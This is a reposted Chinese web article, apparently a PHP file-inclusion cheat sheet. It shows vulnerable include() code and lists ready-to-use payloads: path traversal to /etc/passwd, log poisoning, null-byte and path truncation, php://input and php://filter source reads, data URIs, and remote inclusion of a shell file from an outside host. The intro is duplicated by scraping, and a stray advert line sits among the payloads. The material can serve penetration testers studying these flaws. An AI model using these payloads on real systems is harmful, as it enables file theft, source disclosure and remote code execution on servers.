加入收藏 | 设为首页 | 会员中心 | 我要投稿 汽车网 (https://www.0577qiche.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > PHP教程 > 正文

关于PHP文件包括一些漏洞分析

发布时间:2023-07-26 09:17:22 所属栏目:PHP教程 来源:
导读:文章简单的分析了在php文件包含时inlcude的一个漏洞分析,下面希望对大家有点用处.

基本的文件包含漏洞,代码如下:

<?php include(“includes/” . $_GET[&#39;file&#39;]); ?>
* 包含同路径下的文件
文章简单的分析了在php文件包含时inlcude的一个漏洞分析,下面希望对大家有点用处.

基本的文件包含漏洞,代码如下:

<?php include(“includes/” . $_GET['file']); ?> 
* 包含同路径下的文件: 
file=.htaccess 
* 路径遍历: 
file=../../../../../../../../../var/lib/locate.db 
(该文件非常有趣因为它允许你搜索文件系统) 
* 包含注入PHP代码的文件: 
file=../../../../../../../../../var/log/apache/error.log 
(you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.) 
受限的本地文件包含如下代码:

 <?php include(“includes/” . $_GET['file'] . “.htm”); ?> 
* 空字符注入(Null Byte Injection): 
file=../../../../../../../../../etc/passwd%00 
(需要magic_quotes_gpc=off) 
* 列目录(Null Byte Injection): 
file=../../../../../../../../../var/www/accounts/%00 
(仅限BSD, 需要magic_quotes_gpc=off,详细信息here) 
*路径截断(Path Truncation): 
file=../../../../../../../../../etc/passwd........... … 
(详细信息参见 here 和 here) 
* 点号截断: 
file=../../../../../../../../../etc/passwd……………. … 
仅限Windows,更多细节参见here

基本的远程文件包含,代码如下:

<?php include($_GET['file']); ?>
* 包含远程代码(Including Remote Code):
file=[http|https|ftp]://websec.wordpress.com/shell.txt 
(需要 allow_url_fopen=On 和 allow_url_include=On) 
* 使用php输入流(Using PHP stream php://input): 
file=php://input 
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On) 
* 使用PHP过滤函数(Using PHP stream php://filter): 
file=php://filter/convert.base64-encode/resource=index.php 
(lets you read PHP source because it wont get evaluated in base64. More details here and here) 
* Using data URIs: 
file=data://text/plain;base64,SSBsb3ZlIFBIUAo= 
(需要 allow_url_include=On) 
* 用于跨站脚本攻击(Using XSS): 
//开源代码Cuoxin.com 
file=http://127.0.0.1/path/xss.php?xss=phpcode 
(makes sense if firewalled or only whitelisted domains allowed) 
受限的远程文件包含漏洞,代码如下:

<?php include($_GET['file'] . “.htm”); ?> 
* file=http://websec.wordpress.com/shell 
* file=http://websec.wordpress.com/shell.txt? 
* file=http://websec.wordpress.com/shell.txt%23 
(需要 allow_url_fopen=On 和 allow_url_include=On) 
静态远程文件包含漏洞,代码如下:

<?php include(“http://192.168.1.10/config.php”); ?> 
* 中间人攻击(Man In The Middle) 
(lame indeed, but often forgotten) 
 

(编辑:汽车网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章